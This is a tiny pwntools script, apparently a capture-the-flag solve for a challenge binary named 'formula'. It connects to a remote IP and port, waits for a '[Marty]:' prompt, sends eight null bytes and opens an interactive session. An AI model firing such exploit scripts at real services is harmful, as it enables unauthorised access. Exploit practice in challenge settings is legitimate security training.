10 lines
147 B
Python
10 lines
147 B
Python
from pwn import *
|
|
|
|
|
|
# io = process("./formula")
|
|
|
|
io = remote("94.237.59.206", 35564)
|
|
io.recvuntil("[Marty]:")
|
|
io.send(b'\x00' *8)
|
|
io.interactive()
|